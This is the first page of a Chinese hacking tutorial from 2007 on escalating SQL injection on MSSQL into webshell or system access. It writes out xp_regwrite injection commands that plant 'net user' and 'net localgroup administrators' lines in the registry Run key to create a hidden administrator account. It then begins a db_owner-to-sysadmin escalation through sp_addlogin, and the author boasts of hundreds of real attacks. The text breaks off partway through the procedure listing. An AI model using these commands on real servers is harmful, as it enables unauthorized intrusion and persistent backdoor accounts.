文章分类 | 推荐文章 | 最新文章 | 热点文章 | 最新软件 | 精品软件 | 下载排行 | 推荐下载 | 免费看大片 | WPS | 杀毒软件
清风网络
首 页 软件下载 网络学院 数码学院
QQ 电脑入门 游戏 操作系统 图形处理 办公软件 媒体动画 精文荟萃 工具软件 网络编程 程序开发 网络技术 认证考试 网站建设 文章专栏
当前位置:清风网络学院网络技术网络安全sql injection终极利用方法
精品推荐
特别推荐
·无线入侵的技术细节
·SQL注入和CSS攻击的检测
·详解:五种Windows常用密码设置
·浅析黑客攻击时的常用方法和攻击步骤
·不怕攻击 家庭上网必学八招安全绝招
·入门者如何获取肉鸡
·Linux安全配置步骤简述
·Wi-Fi网络安全探讨及组网策略
·网页病毒的概念
·保障您网站安全的十点技巧
·技巧:网上交易密码保护的几种窍门
·六个简单方法防止上网被钓鱼
·PING命令的小秘密
·安全第一 网络端口扫描技术介绍
·十大网络工具帮你审核网络安全
·信息安全问题需解决方案
·多角度详细解释网站安全保护方法
·端口截听实现端口隐藏,嗅叹与攻击
·用Win NT/2K 建WEB站点安全指南
·实现 Web 应用程序安全的捷径
热点TOP10
·不怕攻击 家庭上网必学八招安全绝招
·开3389最简单得方法
·使用Windows的安全802.11网络企业部署一
·详解:五种Windows常用密码设置
·恢复本来面目 消除JPEG图片马赛克
·黑客攻击步骤-如何获得IP
·使用 OpenSSL API 进行安全编程
·最强安全基础 从0到33600端口详解
·软件漏洞及缓冲区溢出
·浅析黑客攻击时的常用方法和攻击步骤
·使用Windows的安全802.11网络企业部署二
·无线入侵的技术细节
·无进程DLL木马开发思路与实现
·黑客必备的基本技能
·入门者如何获取肉鸡
·nc.exe高级技巧应用汇总
·CISCO路由器配置小结
·SQL注入和CSS攻击的检测
·组策略安全选项对应注册表项汇总
·邪恶八进制内部隐藏工具NOFILE

sql injection终极利用方法

日期:2007年4月30日 作者: 查看:[大字体 中字体 小字体]


 

————只要给我一个注射点,无论什么权限,我都给你一个webshell甚至系统权限



声明:本文仅用于教学目的,如果因为本文造成的攻击后果本人概不负责。因为发觉其危害过大,原文已经经过大量删减及修改,即使这样本文的危害性仍然很大,所以请大家不要对国内的站点做任何具有破坏性的操作。考虑再三,偶还是决定发出来。此招手段歹毒,利用范围广泛,可以说是只要是有sql注射漏洞的网站,只要运用此法99%可以拿到webshell甚至系统权限(不敢把话说满,呵呵,经本人数百次真实“实战演习”,基本上是100%可以拿到webshell甚至系统权限)。

记得我在《MSSQL db_owner角色注入直接获得系统权限(续)》中写过一种利用xp_regwrite来取得系统权限的方法:xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\currentvers ion\run','xwq1','REG_SZ','net user xwq xwq /add'

xp_regwrite HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\currentvers ion\run','xwq2','REG_SZ','net localgroup administrators xwq /add',只要让网站所在的服务器重起,就能得到系统权限。经过本人的数百次的真实实验,这种方法不太实用,很容易引起网管的注意,再说ddos也是违法的事(偶可是好人啊),发动一场ddos要花费的大量的人力,物力(看你的肉鸡多少拉)。所以不太可行(除非是你十分想要搞定的网站)。

呵呵,哆嗦拉那么多,你可能看的已经不耐烦拉,好,这就介绍我的三大必杀技之一————万能提权。

假如一个网站存在sql注射漏洞,如果这个网站是用固定服务器sysadmin权限的用户作的连接(呵呵,通俗点说就是sa,菜鸟可以这样认为),呵呵,想要拿到一个webshell或者是系统权限可以说是易如反掌,轻而易举的事,据我所知,sysadmin权限要拿到webshell或者系统权限不下10种,呵呵,可能更多吧(偶只会10种),sysadmin怎么拿到webshell或者系统权限,我不想多说,想比大家都已经烂熟于心拉,可是要是一个网站是db_owner权限呢?你怎么办,你怎么拿系统权限,怎么拿webshell(没有上传漏洞和数据库备份等功能),大家可能回说backup a shell,我记得LCX也在《MSSQL db_owner角色注入直接获得系统权限》里说过拉“备份得到的shell只是理论化的东东,如果一个webshell有20mb的话,你还能用它吗?”呵呵,要是我告诉你db_owner拿到一个webshell或者是系统权限的方法和sysadmin权限的一样多,你回有什么反映,是不是觉得有点不可思议,或者又是我胡说呢?(不相信的朋友,下面的内容就不要看拉)

呵呵,是不是看的心痒痒拉,迫不及待的想知道啊,好,我不在废话拉,这就把我的三大必杀技之一————万能提升权限方法告诉大家。

在告诉大家之前,我们先做个实验.实验环境windowsxp sp1+SQL 2000 sp3,大家跟着我来step to step,首先新建一个具有db_owner的权限的用户,这里我是xwq(就是在服务器角色里面什么都不要选,在数据库角色里面钩上db_owner),好,现在我们打开查询分析器用xwq连上后再里面输入sp_addlogin xuwenqiang,执行看看,出现拉什么?



服务器: 消息 2571,级别 14,状态 2,过程 sp_addlogin,行 16

用户 'xwq' 没有运行 DBCC auditevent 的权限。

服务器: 消息 15247,级别 16,状态 1,过程 sp_addlogin,行 17

用户没有执行此操作的权限。



呵呵,出现上面的错误信息这很正常,因为只有sysadmin 和 securityadmin 固定服务器角色的成员才可以执行 sp_addlogin,那么怎么才好让sp_addlogin为我所用呢?我们在这里看一下sp_addlogin的代码:

create procedure sp_addlogin

@loginame  sysname

,@passwd         sysname = Null

,@defdb          ; ; sysname = 'master'      -- UNDONE: DEFAULT

CONFIGURABLE???

,@deflanguage    sysname = Null

,@sid   varbinary(16) = Null

,@encryptopt  varchar(20) = Null

AS

-- SETUP RUNTIME OPTIONS / DECLARE VARIABLES --

set nocount on

Declare @ret    int    -- return value of sp call


[1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] 下一页 




上一篇:Microsoft AntiSpyware微软出品的反间谍软件

下一篇:利用IIS最大连接数实现网站DOS

sql injection终极利用方法 相关文章:
·GHOST使用方法(图解)
·女性自慰方法大搜查
·qq空间皮肤背景代码:QQ空间不用Q币更换主页皮肤方法
·菜鸟必看:WinXP终极优化
·QQ挂号升级方法
·电脑提速的新方法
·男性自慰的几种方法
·《拳皇2002》隐藏人物出现方法 - 游戏秘籍
·QQ好友隐身也难 两种方法抓出隐身好友
·《混乱军团》初期获得死亡魔魂方法
sql injection终极利用方法 相关软件:
·终极刺客 2 沉默杀手完美硬盘版
·终极刺客 血钱硬盘版
·黑客视频教程-网吧代理服务器使用灰鸽子端口映射方法
·IE终极加速v3.0 汉化版
·利用IE修复专家突破网吧的多重限制
·虚拟光驱的使用方法(全)swf
·六顶思维帽方法
·掌握中国人性的管理方法
·现代企业领导艺术与方法
·实用局域网终极制作教程

特别声明:本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。
[打印本页] [关闭窗口] 转载请注明来源:http://www.vipcn.net
| 帮助(?) | 版权声明 | 友情连接 | 关于我们 | 信息发布
Copyright 2007 www.vipcn.net All Rights Reserved. 鄂ICP备05000083号Powered by:viphot